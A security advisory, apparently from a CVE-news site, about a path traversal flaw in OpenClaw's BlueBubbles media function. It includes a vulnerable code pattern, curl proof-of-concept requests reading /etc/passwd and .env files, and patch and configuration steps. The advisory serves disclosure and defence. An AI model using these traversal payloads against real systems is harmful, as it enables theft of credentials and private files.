OpenClaw, Path Traversal, CVE-2026-XXXX (High)

Listen to this Post

The BlueBubbles extension in OpenClaw versions prior to 2026.2.14 contains a path traversal vulnerability. The `sendBlueBubblesMedia` function improperly handles the `mediaPath` parameter. When a non-HTTP media source is provided, the function resolves it as a local filesystem path and reads the file directly from disk without any validation. The vulnerable code lacks an allowlist of safe directories, allowing an attacker to request arbitrary system files. By supplying a path like `../../../../etc/passwd` or its equivalent on other operating systems, an attacker can force the application to read sensitive local files. These files are then exfiltrated as media attachments. The fix implements two security measures: it introduces a required configuration setting (channels.bluebubbles.mediaLocalRoots) that defines explicit trusted directories, and it enforces canonical-path containment checks to verify that resolved paths stay within the allowed roots before reading any local file. The fix is implemented in commit 71f357d.
Platform: openclaw (npm)
Version: < v2026.2.14
Vulnerability: Arbitrary file read
Severity: High
Date: February 18, 2026

Prediction: Patch already planned

What Undercode Say:

Analytics

The vulnerability exists in the `sendBlueBubblesMedia` function. Review the vulnerable code pattern:

// Vulnerable code pattern (simplified)
async function sendBlueBubblesMedia(mediaPath) {
if (!mediaPath.startsWith('http')) {
// No path validation - reads any file
const fileContent = await fs.readFile(mediaPath);
return sendAsAttachment(fileContent);
}
}

Check if your version is affected:

npm list openclaw
If version < 2026.2.14, vulnerable

Exploit:

Proof of concept demonstrating file exfiltration:

Exploit using the vulnerable mediaPath parameter
curl -X POST https://target.openclaw.instance/sendMedia \
-H "Content-Type: application/json" \
-d '{
"mediaPath": "/etc/passwd",
"channel": "bluebubbles"
}'
Alternative path traversal examples
curl -X POST https://target.openclaw.instance/sendMedia \
-d '{"mediaPath":"../../../.env","channel":"bluebubbles"}'

Protection:

Upgrade to patched version and configure allowed paths:

Update to fixed version
npm install [email protected]
Configure in your OpenClaw config file
cat >> config.json << EOF
{
"channels": {
"bluebubbles": {
"mediaLocalRoots": ["/app/uploads", "/app/media"]
}
}
}
EOF

Verify the fix implementation:

Check if patch is applied
grep -r "canonical-path" node_modules/openclaw/
Expected: containment checks present

Impact

An attacker with the ability to trigger BlueBubbles media sends can exfiltrate any local file accessible to the OpenClaw process. This includes sensitive system files like /etc/passwd, application configuration files containing API keys and database credentials, private SSH keys, and source code. The vulnerability effectively bypasses all filesystem access controls, leading to complete disclosure of data readable by the application process.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top